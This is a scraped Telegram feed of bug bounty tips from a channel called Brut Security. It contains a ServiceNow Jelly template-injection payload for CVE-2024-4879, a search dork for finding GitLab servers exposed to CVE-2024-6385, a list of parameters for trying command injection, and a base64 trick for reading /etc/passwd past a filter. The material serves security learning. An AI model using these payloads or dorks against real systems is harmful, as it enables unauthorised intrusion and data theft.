Brut Security pinned «📣 Understanding Bug Bounty Hunting for Newcomers📣 🎁 Bug bounty hunting can seem appealing, but it’s important to know: 🖱 High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to…»
http://1337/login.do?jvar_page_noscript=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
🔖#bugbounty #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
www.assetnote.io
Chaining Three Bugs to Access All Your ServiceNow Data
Through the course of 3/4 weeks, we were able to find a chain of vulnerabilities that allows full database access and full access to any MID servers configured. This resulted in 3 separate CVE's.
❤1👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
shreyaschavhan on Notion
Year in Bug Bounties - from 0 to $25,700* in 12 months (Stats, Graphs, Learnings, Experiences & Plans!) | Notion
Table of Content:
🔥5👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
ffuf -c -ac -r -u https://target[.]com/FUZZ -w wordlist.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - six2dez/OneListForAll: Rockyou for web fuzzing
Rockyou for web fuzzing. Contribute to six2dez/OneListForAll development by creating an account on GitHub.
🔥5
CVE-2024-6385: Improper Access Control in GitLab, 9.6 rating 🔥
The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.
Search at Netlas.io:
👉 Link: https://nt.ls/HvsUY
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef
Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.
Search at Netlas.io:
👉 Link: https://nt.ls/HvsUY
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef
Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
CVE-2024-4879 | Template Injection Vulnerability in ServiceNow | Bug Bounty POC | Brut Security
🚨CVE-2024-4879 & CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches
⚖These vulnerabilities enable unauthenticated remote attackers to execute arbitrary code within the Now Platform,
potentially leading to complete…
⚖These vulnerabilities enable unauthenticated remote attackers to execute arbitrary code within the Now Platform,
potentially leading to complete…
🤡2❤1🔥1
Brut Security
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
Brut Security
Parameters where you can try Command Injection. ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} …
Keep Checking Old Posts 🍿
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
url/?f=etc/passwd ==> 403
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...
By:@GodfatherOrwa
#bugbountytips #BugBounty
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...
By:@GodfatherOrwa
#bugbountytips #BugBounty
👍10🔥2🤔2❤1